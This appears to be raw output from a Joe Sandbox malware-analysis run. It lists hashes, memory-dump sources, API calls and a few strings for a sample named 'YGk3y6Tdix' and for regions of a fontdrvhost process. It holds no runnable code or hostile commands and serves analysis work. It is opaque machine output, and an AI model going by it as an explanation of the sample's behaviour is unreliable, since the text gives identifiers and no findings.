                                                                                                                                                                                              • Opcode ID: 238688c580de31445dfd0f1874c22d9e105b8c7cfd977571d84c0ecda1c8aff5
                                                                                                                                                                                              • Instruction ID: 5c53df4bca7e532e3ccb481fcad567a81daae48a8002ca317883f55358ddcfa5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 238688c580de31445dfd0f1874c22d9e105b8c7cfd977571d84c0ecda1c8aff5
                                                                                                                                                                                              • Instruction Fuzzy Hash: CD01F9A350431279A6306B359C46E6BB7ACDE97770B40841EF544D6083EB38D444E3B2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00010000,00FB1160,?,00000000,00000000), ref: 00FB1043
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00FB108A
                                                                                                                                                                                                • Part of subcall function 00FA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA6C54
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                              • API String ID: 2655393344-3849766595
                                                                                                                                                                                              • Opcode ID: b7fb1d92d3742f9feb91b3adef4b1a5999622cc25e19239a7f2c438e6c43663c
                                                                                                                                                                                              • Instruction ID: b867facdc5eef448e930144813d6d24626730ef79f8a8010cbc2199e3578b123
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7fb1d92d3742f9feb91b3adef4b1a5999622cc25e19239a7f2c438e6c43663c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C01DBB53443496BD330AF7ADC51FB6B369FB407A1F10002EF64696181CAB1A8857625
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FAE2E8: _swprintf.LIBCMT ref: 00FAE30E
                                                                                                                                                                                                • Part of subcall function 00FAE2E8: _strlen.LIBCMT ref: 00FAE32F
                                                                                                                                                                                                • Part of subcall function 00FAE2E8: SetDlgItemTextW.USER32(?,00FDE274,?), ref: 00FAE38F
                                                                                                                                                                                                • Part of subcall function 00FAE2E8: GetWindowRect.USER32(?,?), ref: 00FAE3C9
                                                                                                                                                                                                • Part of subcall function 00FAE2E8: GetClientRect.USER32(?,?), ref: 00FAE3D5
                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                              • API String ID: 2622349952-4108050209
                                                                                                                                                                                              • Opcode ID: 82c09ed6b8bc69afd7e3f4b8b2f2b34b22008b0acc3d08bf92f3299af2a149ec
                                                                                                                                                                                              • Instruction ID: 2405260cbf881a7ed81b7b0901f711b31f469ed40fb330e2c247b864e0dd0ed5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82c09ed6b8bc69afd7e3f4b8b2f2b34b22008b0acc3d08bf92f3299af2a149ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7F0C2B090538CAADF160F61CC0DBEA3FA9BF46354F098214FD8454591CB7AD990FB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00FB1206,?), ref: 00FB0FEA
                                                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 00FB0FF6
                                                                                                                                                                                                • Part of subcall function 00FA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA6C54
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FB0FFF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                              • API String ID: 1091760877-2248577382
                                                                                                                                                                                              • Opcode ID: b0c322056abaea7466d0d21bf434165116b7f7d0b2ea71f5d6414f6a5b64dc4f
                                                                                                                                                                                              • Instruction ID: 9e96fca69569fd4e8836f2c77f5d6bdec2a67926445710bd073a671e3f8d09f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: b0c322056abaea7466d0d21bf434165116b7f7d0b2ea71f5d6414f6a5b64dc4f
                                                                                                                                                                                              • Instruction Fuzzy Hash: A1D02B7150412437C61033355C09C6E79059B12332B540705F238A12F6CA2549817693
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00FADA55,?), ref: 00FAE2A3
                                                                                                                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FADA55,?), ref: 00FAE2B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FindHandleModuleResource
                                                                                                                                                                                              • String ID: RTL
                                                                                                                                                                                              • API String ID: 3537982541-834975271
                                                                                                                                                                                              • Opcode ID: 549035cd02192b6256c6de30ab7e2962b4981cf0ed20d5956373d62b4e1f3073
                                                                                                                                                                                              • Instruction ID: e6db227f2ea3bd0a8e956278a450f2e05d1769ee77e6b561e9ed7729f9e1dfa7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 549035cd02192b6256c6de30ab7e2962b4981cf0ed20d5956373d62b4e1f3073
                                                                                                                                                                                              • Instruction Fuzzy Hash: B3C0123164171066E63027746C0DB437B595B01B15F09045AB341E92D1D6A5C540A6A2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 5[_H
                                                                                                                                                                                              • API String ID: 0-3279724263
                                                                                                                                                                                              • Opcode ID: f573f62a4c13b21d55ef58f5fbd65f6ec717bb957a6c02d05d040b5ed1917820
                                                                                                                                                                                              • Instruction ID: 1a211a60ac3436a3058511a9c60a5ccc14e03849cfa031550408bebf242bd18c
                                                                                                                                                                                              • Opcode Fuzzy Hash: f573f62a4c13b21d55ef58f5fbd65f6ec717bb957a6c02d05d040b5ed1917820
                                                                                                                                                                                              • Instruction Fuzzy Hash: DC91E5B5A29A8D8FE759DB6888757A97BE1FF9A300F4001BED019D72E6DBB81411C700
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b9d7c378455179903d981955e02e31dd89bc4a5d9182c6527ef380a1cb59b64e
                                                                                                                                                                                              • Instruction ID: f471a439b2b97bf78c512239d1297bf7fa0764c88ab83be70cd51ea4d87a9c0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9d7c378455179903d981955e02e31dd89bc4a5d9182c6527ef380a1cb59b64e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1552CE70A196499FDB6CCF68C4E86BD77A1FF58300F5041BDD45ECB29ACA78A981CB40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9fb03a3e678020bedd6ebc18db5413cb3aac684b08aa3d9349607edf6904dade
                                                                                                                                                                                              • Instruction ID: a90334cf380c6a565119e2165652ccc032cadc9058ef63719baafe0bf87fbb7f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fb03a3e678020bedd6ebc18db5413cb3aac684b08aa3d9349607edf6904dade
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C51D2B5A28D4D8FE798EB9CC8697A97BE0EB9A314F5001BED019D73D9DBB814118300
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: c9$!k9$"s9
                                                                                                                                                                                              • API String ID: 0-3426396564
                                                                                                                                                                                              • Opcode ID: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
                                                                                                                                                                                              • Instruction ID: 07960ecc945c78fc3916653149dd8474f82545f6b37777317d9bb0e272078288
                                                                                                                                                                                              • Opcode Fuzzy Hash: 964e90bf5b31a5ecb5eb94aa9d1524e360d8db055ca863c69c2fe0ffacba69cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0F43B728D0A8BC7016B3EB8805D57780EBD9636BD505BBD204CB261E2201C9E83E0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                                              • Opcode ID: d2cf73b7476ba05bea2307850b0ee1f4a5bef0982d26c65ade00c57166022935
                                                                                                                                                                                              • Instruction ID: 7f7f3aa948465572a173a87dd154ebb1a12b950fd03c622b34b9b7f1f9010470
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2cf73b7476ba05bea2307850b0ee1f4a5bef0982d26c65ade00c57166022935
                                                                                                                                                                                              • Instruction Fuzzy Hash: 97518E71E1950E8FDB58DBA8C4A55FDB7B1FF98300F1141BAD01EE7296CA342A02CB50
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                                              • Opcode ID: 81206ec655b87ef3e5806bb25f3477f1d01e05d546a69041ef971c94f3955f37
                                                                                                                                                                                              • Instruction ID: 5e3eaa04f12b98087811db74bb5570539ced11660409f58c1f3717ffee576ffc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 81206ec655b87ef3e5806bb25f3477f1d01e05d546a69041ef971c94f3955f37
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08515A71E0954E9FDB59DBA8C4A95FCB7B1EF59300F1140BAC01EA72E2CA782A05CB50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c0d60c48eb0b8c499bd489a5a72c8d9e6c4203dbf72c752072f5a4ce32a69f0a
                                                                                                                                                                                              • Instruction ID: 56c12f2ed83022b1d6967dc33d645b89b268b6511700bae912001531119b7c98
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0d60c48eb0b8c499bd489a5a72c8d9e6c4203dbf72c752072f5a4ce32a69f0a
                                                                                                                                                                                              • Instruction Fuzzy Hash: D3F1E53061965A9FDB59CF68C4E16B83BA1FF45300B5545BDC84ECB29BCA38E982CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2e31a926fe35e83a55c10b16e4cb9bf9e8b3166cb8d9516d7e05772d7a40bb06
                                                                                                                                                                                              • Instruction ID: 34ca4949ac11320a61be320875d180109311d9519a971c84a043f1811ded5c43
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e31a926fe35e83a55c10b16e4cb9bf9e8b3166cb8d9516d7e05772d7a40bb06
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DD1F230A0EA4E8FD378DB78C4E557977E1FF44300B1545BEE48EC76A2DA29B9428B41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 921a06e580b8eb56d843ac806224a5841d12dc1f31c6f146f1c4f13349a4ea9f
                                                                                                                                                                                              • Instruction ID: 13c18238019ca10cfe489f045562e19b681a1f2a4581a167caca7027ca92d82c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 921a06e580b8eb56d843ac806224a5841d12dc1f31c6f146f1c4f13349a4ea9f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92C1053061A55A9BEB2DCF68C4F15B83BA0FF45300B5545BDC88B8B69BCA38F542CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7b56749e516a14b9ba0642ce3ba11ea1e98f9eac7de4985f40e27da51c59c5d6
                                                                                                                                                                                              • Instruction ID: 17d0e7ddf349c684bcd787f7cb8fd4b0b30c760966f020498b2e8df87815efe1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b56749e516a14b9ba0642ce3ba11ea1e98f9eac7de4985f40e27da51c59c5d6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC1F67071D94A4FD359DB78C4A56B8BBA0FF85300F4541B9C44EC7A97DB28BA52C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 678c12080d129a4fba167e86ad6670a7323bfe8e69cc9c17295420001cfe6238
                                                                                                                                                                                              • Instruction ID: 4c5db3544dd06499b97d59c88c761f31b040d6b43161d3c6439eaadc65741148
                                                                                                                                                                                              • Opcode Fuzzy Hash: 678c12080d129a4fba167e86ad6670a7323bfe8e69cc9c17295420001cfe6238
                                                                                                                                                                                              • Instruction Fuzzy Hash: FFC1E371B1DA4B4FE359DB68C0B16A8BBA1FF49300F4541B9D04EC7AA7DB28B951C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9090ce4d91503c4cfb4d4b954cafac0d54301ef5ababfc451647db52a77fcae2
                                                                                                                                                                                              • Instruction ID: 948983e13f462595477e2577838fb64e69e71fa4330728eb218232d47e36fdfa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9090ce4d91503c4cfb4d4b954cafac0d54301ef5ababfc451647db52a77fcae2
                                                                                                                                                                                              • Instruction Fuzzy Hash: BAC1163071EA4A4FE359DB79C4E16A8BBA1FF19300F4541B9C14EC7AA7CB28B951C781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: aa4fecef551eb56d8a1d990fccb0920548d133974f2ab6eb23e674f997495224
                                                                                                                                                                                              • Instruction ID: b0dff5e7f593a566e6a38b868405596f44bdfe3f48dcd49f7c88fcf203522333
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa4fecef551eb56d8a1d990fccb0920548d133974f2ab6eb23e674f997495224
                                                                                                                                                                                              • Instruction Fuzzy Hash: A4310C12F0F5AF86F23926F968B14FC6640DF51321F1A01B7E4ADC70E6DD4C2A495342
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 96818be7e7f15a4d2703d35271278f13263ee33329bda26aebdcfc03a09a92c6
                                                                                                                                                                                              • Instruction ID: 9469dbde579f1eba2cf82d543565ab732822daaf3bc61c90910984dccfca522c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 96818be7e7f15a4d2703d35271278f13263ee33329bda26aebdcfc03a09a92c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0021E452F1E19B8AE73962B968B64BC3740EF41630F5A02FAD44E470EBDC4C3A819391
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cd3dfbd5efca76b052e424cb0634d1fd1ae2712e100c8c59982bcfd965e91621
                                                                                                                                                                                              • Instruction ID: d29ccc14fadccbbe73120f494b99485aafafa64b8a5c7a4ffbff013cfa0a9071
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd3dfbd5efca76b052e424cb0634d1fd1ae2712e100c8c59982bcfd965e91621
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B8139B1B0EA4A4FE3789BB894A557977E0FF85314F1605BED08FC31A2DE2876028741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 02cc81bdee82dcee9097ad1d331dbe4ef2ee5aa32ca69bb2c7d9b055a2de127b
                                                                                                                                                                                              • Instruction ID: 7f980c1a4b9e1a10c640805607a277d1e963db1b2ef77177b201049f5e1226bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02cc81bdee82dcee9097ad1d331dbe4ef2ee5aa32ca69bb2c7d9b055a2de127b
                                                                                                                                                                                              • Instruction Fuzzy Hash: BF817A21B0EA4A4FE3789BB984B54B977E0FF46311B16057ED28FD31A2DE18B5028345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9530bf65d6abf51e0618a287d9ecc594861f7048d02a8dd631055f4717e4e52b
                                                                                                                                                                                              • Instruction ID: 13a166f73fd76d697a969083521ad70da5fb230939afd8f62e120e4fb3cde40a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9530bf65d6abf51e0618a287d9ecc594861f7048d02a8dd631055f4717e4e52b
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6813D31B0E64A4FE37C9AB894A55BD77E0EF86310B15057ED48FC71A2DE28BA038741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 35edcf0050cf6d7bc7a1bb2c86782be13e07db1ffd3fb82e4d25191fe15e7cf4
                                                                                                                                                                                              • Instruction ID: fe5f34a84cc87dd75a7b05bc397f500953ff93c709ca9e7823cf0490986b750e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 35edcf0050cf6d7bc7a1bb2c86782be13e07db1ffd3fb82e4d25191fe15e7cf4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92812831B0E54E4FE7B8DA7884A64BC37D0FF44310B1602B9F49EC75B6DE18AA169781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
